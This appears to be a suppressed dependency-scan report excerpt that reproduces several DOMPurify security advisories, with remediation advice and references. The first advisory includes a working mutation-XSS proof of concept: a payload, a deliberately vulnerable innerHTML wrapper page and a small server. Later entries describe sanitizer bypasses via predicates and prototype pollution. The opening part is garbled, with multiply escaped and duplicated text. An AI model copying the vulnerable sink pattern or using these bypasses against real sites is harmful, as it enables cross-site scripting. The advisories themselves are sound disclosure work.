onerror=alert('expoc')>"> `` 5. Click `Sanitize + Render`. 6. Observe: - `Sanitized response` still contains the `` sequence inside `alt`. - The sink reparses to include `&amp;amp;amp;lt;img src="x" onerror="alert('expoc')"&amp;amp;amp;amp;gt;`. - `alert('expoc')` is triggered. 7. Files: - index.html ``&amp;amp;amp;lt;/p&amp;amp;amp;gt;
&amp;amp;amp;lt;pre&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;!doctype html&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;html lang="en"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;head&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;meta charset="utf-8"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;meta name="viewport" content="width=device-width, initial-scale=1"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;title&amp;amp;amp;amp;gt;expoc -
DOMPurify SSR PoC&amp;amp;amp;amp;lt;/title&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;style&amp;amp;amp;amp;gt; :root { --bg: #f7f8fb; --panel: #ffffff; --line: #d8dce6; --
text: #0f172a; --muted: #475569; --accent: #0ea5e9; } \* { box-sizing: border-box; } body {
margin: 0; font-family: "SF Mono", Menlo, Consolas, monospace; color: var(--text);
background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); } main { max-
width: 980px; margin: 28px auto; padding: 0 16px 20px; } h1 { margin: 0 0 10px; font-size:
1.45rem; } p { margin: 0; color: var(--muted); } .grid { display: grid; gap: 14px; margin-top:
16px; } .card { background: var(--panel); border: 1px solid var(--line); border-radius: 12px;
padding: 14px; } label { display: block; margin-bottom: 7px; font-size: 0.85rem; color: var
(--muted); } textarea, input, select, button { width: 100%; border: 1px solid var(--line);
border-radius: 8px; padding: 9px 10px; font: inherit; background: #fff; } textarea { min-
height: 110px; resize: vertical; } .row { display: grid; grid-template-columns: 1fr 230px;
gap: 12px; } button { cursor: pointer; background: var(--accent); color: #fff; border-color:
#0284c7; } #sink { min-height: 90px; border: 1px dashed #94a3b8; border-radius: 8px;
padding: 10px; background: #f8f9fa; } pre { margin: 0; white-space: pre-wrap; word-
break: break-word; } .note { margin-top: 8px; font-size: 0.85rem; } .status-grid { display:
grid; grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); gap: 8px; margin-top:
10px; } .status-item { border: 1px solid var(--line); border-radius: 8px; padding: 8px 10px;
font-size: 0.85rem; background: #fff; } .status-item.vuln { border-color: #ef4444;
background: #fef2f2; } .status-item.safe { border-color: #22c55e; background: #f0fdf4; }
@media (max-width: 760px) { .row { grid-template-columns: 1fr; } } &amp;amp;amp;amp;lt;/style&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/head&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;body&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;main&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;h1&amp;amp;amp;amp;gt;expoc - DOMPurify Server-Side PoC&amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; Flujo: input -&amp;amp;amp;amp;gt; POST
/sanitize (Node + jsdom + DOMPurify) -&amp;amp;amp;amp;gt; render vulnerable con innerHTML. &amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div
class="grid"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;section class="card"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;label for="payload"&amp;amp;amp;amp;gt;Payload&amp;amp;amp;amp;lt;/label&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;textarea
id="payload"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x alt="&amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x onerror=alert('expoc')&amp;amp;amp;amp;gt;"&amp;amp;amp;amp;lt;/textarea&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;div class="row" style="margin-top: 10px;"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;label for="wrapper"&amp;amp;amp;amp;gt;Wrapper en
sink&amp;amp;amp;amp;lt;/label&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;select id="wrapper"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="div"&amp;amp;amp;amp;gt;div&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="
textarea"&amp;amp;amp;amp;gt;textarea&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="title"&amp;amp;amp;amp;gt;title&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="style"
&amp;amp;amp;amp;gt;style&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="script" selected&amp;amp;amp;amp;gt;script&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="xmp"
&amp;amp;amp;amp;gt;xmp&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="iframe"&amp;amp;amp;amp;gt;iframe&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="noembed"
&amp;amp;amp;amp;gt;noembed&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="noframes"&amp;amp;amp;amp;gt;noframes&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;option value="
noscript"&amp;amp;amp;amp;gt;noscript&amp;amp;amp;amp;lt;/option&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/select&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div style="display:flex;align-items:end;"&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;button id="run" type="button"&amp;amp;amp;amp;gt;Sanitize + Render&amp;amp;amp;amp;lt;/button&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p class="note"
&amp;amp;amp;amp;gt;Se usa render vulnerable: &amp;amp;amp;amp;lt;code&amp;amp;amp;amp;gt;sink.innerHTML = '&amp;amp;amp;amp;amp;lt;wrapper&amp;amp;amp;amp;amp;gt;' + sanitized + '&amp;amp;amp;amp;amp;lt;
/wrapper&amp;amp;amp;amp;amp;gt;';&amp;amp;amp;amp;lt;/code&amp;amp;amp;amp;gt;.&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-grid"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item vuln"&amp;amp;amp;amp;gt;script
(vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item vuln"&amp;amp;amp;amp;gt;xmp (vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="
status-item vuln"&amp;amp;amp;amp;gt;iframe (vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item vuln"&amp;amp;amp;amp;gt;noembed
(vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item vuln"&amp;amp;amp;amp;gt;noframes (vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div
class="status-item vuln"&amp;amp;amp;amp;gt;noscript (vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item safe"&amp;amp;amp;amp;gt;div
(no vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item safe"&amp;amp;amp;amp;gt;textarea (no vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div
class="status-item safe"&amp;amp;amp;amp;gt;title (no vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div class="status-item safe"&amp;amp;amp;amp;gt;style
(no vulnerable)&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/section&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;section class="card"&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;label&amp;amp;amp;amp;gt;Sanitized
response&amp;amp;amp;amp;lt;/label&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;pre id="sanitized"&amp;amp;amp;amp;gt;(empty)&amp;amp;amp;amp;lt;/pre&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/section&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;section class="card"&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;label&amp;amp;amp;amp;gt;Sink&amp;amp;amp;amp;lt;/label&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;div id="sink"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/section&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/div&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/main&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;script&amp;amp;amp;amp;gt; const
payload = document.getElementById('payload'); const wrapper = document.
getElementById('wrapper'); const run = document.getElementById('run'); const
sanitizedNode = document.getElementById('sanitized'); const sink = document.
getElementById('sink'); run.addEventListener('click', async () =&amp;amp;amp;amp;gt; { const response = await
fetch('/sanitize', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body:
JSON.stringify({ input: payload.value }) }); const data = await response.json(); const
sanitized = data.sanitized || ''; const w = wrapper.value; sanitizedNode.textContent =
sanitized; sink.innerHTML = '&amp;amp;amp;amp;lt;' + w + '&amp;amp;amp;amp;gt;' + sanitized + '&amp;amp;amp;amp;lt;' + w + '&amp;amp;amp;amp;gt;'; }); &amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/body&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;
/html&amp;amp;amp;amp;gt; `` - server.js ``js const express = require('express'); const path = require('path');
const { JSDOM } = require('jsdom'); const createDOMPurify = require('dompurify'); const
app = express(); const port = process.env.PORT || 3001; const window = new JSDOM("").
window; const DOMPurify = createDOMPurify(window); app.use(express.json()); app.use(
express.static(path.join(\_\_dirname, 'public'))); app.get('/health', (\_req, res) =&amp;amp;amp;amp;gt; { res.json({
ok: true, service: 'expoc' }); }); app.post('/sanitize', (req, res) =&amp;amp;amp;amp;gt; { const input = typeof req.
body?.input === 'string' ? req.body.input : ''; const sanitized = DOMPurify.sanitize(input);
res.json({ sanitized }); }); app.listen(port, () =&amp;amp;amp;amp;gt; { console.log('expoc running at
http://localhost:\${port}'); }); `` - package.json ``json { "name": "expoc", "version":
"1.0.0", "main": "server.js", "scripts": { "test": "echo \"Error: no test specified\" &amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp; exit
&amp;amp;amp;lt;/pre&amp;amp;amp;gt;
&amp;amp;amp;lt;/div&amp;amp;amp;gt;

```
1", "start": "node server.js", "dev": "node server.js" }, "keywords": [], "author": "",
"license": "ISC", "description": "", "dependencies": { "dompurify": "^3.3.1", "express":
"^5.2.1", "jsdom": "^28.1.0" } } `` ## Evidence - PoC [daft-video.webm](https://github.com
/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) - XSS triggered  ## Why This Happens This is a
mutation-XSS pattern caused by a parse-context mismatch: - Parse 1 (sanitization
phase): input is interpreted under normal HTML parsing rules. - Parse 2 (sink phase):
sanitized output is embedded into a wrapper that changes parser state ( `xmp` raw-text
behavior). - Attacker-controlled sequence ( `</xmp>` ) gains structural meaning in parse 2
and alters DOM structure. Sanitization is not a universal guarantee across all future
parsing contexts. The sink design reintroduces risk. ## Remediation Guidance 1. Do not
concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 2. Keep
the rendering context stable from sanitize to sink. 3. Prefer DOM-safe APIs ( `textContent`,
`createElement`, `setAttribute` ) over string-based HTML composition. 4. If HTML insertion
is required, sanitize as close as possible to final insertion context and avoid wrapper
constructs with raw-text semantics ( `xmp`, `script`, etc.). 5. Add regression tests for
context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout
markers). Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera
and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-
Contextualization in DomPurify 3.3.1. Following Fluid Attacks [Disclosure Policy]
(https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability
and the conditions outlined in the policy are met, this advisory will be published on the
website over the next few days (the timeline may vary depending on maintainers'
willingness to attend to and respond to this report) at the following URL:
https://fluidattacks.com/advisories/daft Acknowledgements: [Camilo Vera](https://github.
com/caverav/) and [Cristian Vargas](https://github.com/tachote). (RETIREJS) suppressed
```

## ## Description

A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).

## ## Vulnerability

The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `

## ## PoC

1. Start the PoC app:

```
```bash
npm install
npm start
```
```

2. Open `http://localhost:3001`.

3. Set `Wrapper en sink` to `xmp`.

4. Use payload:

```
```html
<img src=x alt="</xmp><img src=x onerror=alert('expoc')>">
```
```

5. Click `Sanitize + Render`.

6. Observe:

- `Sanitized response` still contains the `- The sink reparses to include `

- `alert('expoc')` is triggered.

7. Files:

- index.html

```
``html
<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>expoc - DOMPurify SSR PoC</title>
  <style>
    :root {
      --bg: #f7f8fb;
      --panel: #ffffff;
      --line: #d8dce6;
      --text: #0f172a;
      --muted: #475569;
      --accent: #0ea5e9;
    }

    * {
      box-sizing: border-box;
    }

    body {
      margin: 0;
      font-family: "SF Mono", Menlo, Consolas, monospace;
      color: var(--text);
      background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);
    }

    main {
      max-width: 980px;
      margin: 28px auto;
      padding: 0 16px 20px;
    }

    h1 {
      margin: 0 0 10px;
      font-size: 1.45rem;
    }

    p {
      margin: 0;
      color: var(--muted);
    }

    .grid {
      display: grid;
      gap: 14px;
      margin-top: 16px;
    }

    .card {
      background: var(--panel);
      border: 1px solid var(--line);
      border-radius: 12px;
      padding: 14px;
    }

    label {
      display: block;
      margin-bottom: 7px;
      font-size: 0.85rem;
      color: var(--muted);
    }
```



```
textarea,
input,
select,
button {
  width: 100%;
  border: 1px solid var(--line);
  border-radius: 8px;
  padding: 9px 10px;
  font: inherit;
  background: #fff;
}

textarea {
  min-height: 110px;
  resize: vertical;
}

.row {
  display: grid;
  grid-template-columns: 1fr 230px;
  gap: 12px;
}

button {
  cursor: pointer;
  background: var(--accent);
  color: #fff;
  border-color: #0284c7;
}

#sink {
  min-height: 90px;
  border: 1px dashed #94a3b8;
  border-radius: 8px;
  padding: 10px;
  background: #f8fafc;
}

pre {
  margin: 0;
  white-space: pre-wrap;
  word-break: break-word;
}

.note {
  margin-top: 8px;
  font-size: 0.85rem;
}

.status-grid {
  display: grid;
  grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));
  gap: 8px;
  margin-top: 10px;
}

.status-item {
  border: 1px solid var(--line);
  border-radius: 8px;
  padding: 8px 10px;
  font-size: 0.85rem;
  background: #fff;
}

.status-item.vuln {
  border-color: #ef4444;
  background: #fef2f2;
}
```

```

.status-item.safe {
  border-color: #22c55e;
  background: #f0fdf4;
}

@media (max-width: 760px) {
  .row {
    grid-template-columns: 1fr;
  }
}
</style>
</head>
<body>
<main>
  <h1>expoc - DOMPurify Server-Side PoC</h1>
  <p>
    Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con
    innerHTML.
  </p>

  <div class="grid">
    <section class="card">
      <label for="payload">Payload</label>
      <textarea id="payload"><img src=x alt=""></script><img src=x onerror=alert('expoc')></>
    </textarea>
    <div class="row" style="margin-top: 10px;">
      <div>
        <label for="wrapper">Wrapper en sink</label>
        <select id="wrapper">
          <option value="div">div</option>
          <option value="textarea">textarea</option>
          <option value="title">title</option>
          <option value="style">style</option>
          <option value="script" selected>script</option>
          <option value="xmp">xmp</option>
          <option value="iframe">iframe</option>
          <option value="noembed">noembed</option>
          <option value="noframes">noframes</option>
          <option value="noscript">noscript</option>
        </select>
      </div>
      <div style="display:flex;align-items:end;">
        <button id="run" type="button">Sanitize + Render</button>
      </div>
    </div>
    <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;'+
    sanitized + '&lt;/wrapper&gt;';</code>.</p>
    <div class="status-grid">
      <div class="status-item vuln">script (vulnerable)</div>
      <div class="status-item vuln">xmp (vulnerable)</div>
      <div class="status-item vuln">iframe (vulnerable)</div>
      <div class="status-item vuln">noembed (vulnerable)</div>
      <div class="status-item vuln">noframes (vulnerable)</div>
      <div class="status-item vuln">noscript (vulnerable)</div>
      <div class="status-item safe">div (no vulnerable)</div>
      <div class="status-item safe">textarea (no vulnerable)</div>
      <div class="status-item safe">title (no vulnerable)</div>
      <div class="status-item safe">style (no vulnerable)</div>
    </div>
  </section>

  <section class="card">
    <label>Sanitized response</label>
    <pre id="sanitized">(empty)</pre>
  </section>

  <section class="card">

```

```

    <label>Sink</label>
    <div id="sink"></div>
  </section>
</div>
</main>

<script>
const payload = document.getElementById('payload');
const wrapper = document.getElementById('wrapper');
const run = document.getElementById('run');
const sanitizedNode = document.getElementById('sanitized');
const sink = document.getElementById('sink');

run.addEventListener('click', async () => {
  const response = await fetch('/sanitize', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ input: payload.value })
  });

  const data = await response.json();
  const sanitized = data.sanitized || "";
  const w = wrapper.value;

  sanitizedNode.textContent = sanitized;
  sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>';
});
</script>
</body>
</html>
...

```

- server.js

```

...js
const express = require('express');
const path = require('path');
const { JSDOM } = require('jsdom');
const createDOMPurify = require('dompurify');

const app = express();
const port = process.env.PORT || 3001;

const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);

app.use(express.json());
app.use(express.static(path.join(__dirname, 'public')));

app.get('/health', (_req, res) => {
  res.json({ ok: true, service: 'expoc' });
});

app.post('/sanitize', (req, res) => {
  const input = typeof req.body?.input === 'string' ? req.body.input : "";
  const sanitized = DOMPurify.sanitize(input);
  res.json({ sanitized });
});

app.listen(port, () => {
  console.log(`expoc running at http://localhost:${port}`);
});
...

```

- package.json

```

...json
{

```

```

"name": "expoc",
"version": "1.0.0",
"main": "server.js",
"scripts": {
  "test": "echo \"Error: no test specified\" && exit 1",
  "start": "node server.js",
  "dev": "node server.js"
},
"keywords": [],
"author": "",
"license": "ISC",
"description": "",
"dependencies": {
  "dompurify": "^3.3.1",
  "express": "^5.2.1",
  "jsdom": "^28.1.0"
}
}
...

```

## ## Evidence

- PoC

[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)

- XSS triggered

```

```

## ## Why This Happens

This is a mutation-XSS pattern caused by a parse-context mismatch:

- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.
- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state ('xmp' raw-text behavior).
- Attacker-controlled sequence ('</xmp>') gains structural meaning in parse 2 and alters DOM structure.

Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.

## ## Remediation Guidance

1. Do not concatenate sanitized strings into new HTML wrappers followed by 'innerHTML'.
2. Keep the rendering context stable from sanitize to sink.
3. Prefer DOM-safe APIs ('textContent', 'createElement', 'setAttribute') over string-based HTML composition.
4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics ('xmp', 'script', etc.).
5. Add regression tests for context-switch/mXSS payloads (including '</xmp>', '</noscript>', similar parser-breakout markers).

Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.

Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: <https://fluidattacks.com/advisories/daft>

Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-h8r8-wccr-v5f2
- info - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2>

Vulnerable Software & Versions (RETIREJS):

**## Summary** DOMPurify allows ``ADD_ATTR`` to be provided as a predicate function via ``EXTRA_ELEMENT_HANDLING.attributeCheck``. When the predicate returns ``true``, ``_isValidAttribute`` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as ``<a href="javascript:alert(document.domain)">`` and have the ``javascript:`` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts ``href`` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. **## Impact** Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as ``javascript:`` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. **## Credits** Identified by Cantina's Apex (<https://www.cantina.security>). (RETIREJS) suppressed

**## Summary**

DOMPurify allows ``ADD_ATTR`` to be provided as a predicate function via ``EXTRA_ELEMENT_HANDLING.attributeCheck``. When the predicate returns ``true``, ``_isValidAttribute`` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as ``<a href="javascript:alert(document.domain)">`` and have the ``javascript:`` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts ``href`` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass.

**## Impact**

Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as ``javascript:`` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS.

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Identified by Cantina's Apex (<https://www.cantina.security>).

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-cjmm-f4jc-qw8r
- info - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r>

Vulnerable Software & Versions (RETIREJS):

**## Summary** In ``src/purify.ts:1117-1123``, ``ADD_TAGS`` as a function (via ``EXTRA_ELEMENT_HANDLING.tagCheck``) bypasses ``FORBID_TAGS`` due to short-circuit evaluation. The condition: ``!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])`` When ``tagCheck(tagName)`` returns ``true``, the entire condition is ``false`` and the element is kept — ``FORBID_TAGS[tagName]`` is never evaluated. **## Inconsistency** This contradicts the attribute-side pattern at line 1214 where ``FORBID_ATTR`` explicitly wins first: ``if (FORBID_ATTR[lcName]) { continue; }`` For tags, ``FORBID`` should also take precedence over ``ADD``. **## Impact** Applications using both ``ADD_TAGS`` as a function and ``FORBID_TAGS`` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency. **## Suggested Fix** Check ``FORBID_TAGS`` before ``tagCheck``: ``if`

**(FORBID\_TAGS[tagName]) { /\* remove \*/ } else if (tagCheck(tagName) || ALLOWED\_TAGS[tagName]) { /\* keep \*/ }` `` ## Affected Version v3.3.3 (commit 883ac15) (RETIREJS)**  
**suppressed**

#### ## Summary

In `src/purify.ts:1117-1123`, `ADD\_TAGS` as a function (via `EXTRA\_ELEMENT\_HANDLING.tagCheck`) bypasses `FORBID\_TAGS` due to short-circuit evaluation.

The condition:

```
...  
!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])  
...
```

When `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID\_TAGS[tagName]` is never evaluated.

#### ## Inconsistency

This contradicts the attribute-side pattern at line 1214 where `FORBID\_ATTR` explicitly wins first:

```
...  
if (FORBID_ATTR[lcName]) { continue; }  
...
```

For tags, FORBID should also take precedence over ADD.

#### ## Impact

Applications using both `ADD\_TAGS` as a function and `FORBID\_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency.

#### ## Suggested Fix

Check `FORBID\_TAGS` before `tagCheck`:

```
...  
if (FORBID_TAGS[tagName]) { /* remove */ }  
else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }  
...
```

#### ## Affected Version

v3.3.3 (commit 883ac15)

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-39q2-94rc-95cp
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp>

Vulnerable Software & Versions (RETIREJS):

**## Summary** When `USE\_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED\_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED\_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `## Impact Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered. **## Credits** Identified by Cantina's Apex (<https://www.cantina.security>). (RETIREJS) **suppressed**

#### ## Summary

When `USE\_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED\_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes



via `ALLOWED\_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `` with `USE\_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector.

#### ## Impact

Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered.

#### ## Credits

Identified by Cantina's Apex (<https://www.cantina.security>).

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-cj63-jhhr-wcxv
- info - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv>

Vulnerable Software & Versions (RETIREJS):

**CVE-2026-41238** (RETIREJS) suppressed

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- info - <https://github.com/cure53/DOMPurify/releases/tag/3.4.0>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp>

Vulnerable Software & Versions (RETIREJS):

**CVE-2026-41239** (RETIREJS) suppressed

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- info - <https://github.com/cure53/DOMPurify/releases/tag/3.4.0>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8>

Vulnerable Software & Versions (RETIREJS):

**CVE-2026-41240** (RETIREJS) suppressed

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

#### References:

- info - <https://github.com/cure53/DOMPurify/releases/tag/3.4.0>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m>

Vulnerable Software & Versions (RETIREJS):

### remotegui.zip: hugerte.jar: theme.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/hugerte.jar/META-INF/resources/webjars/hugerte/1.0.10/themes/silver/theme.js

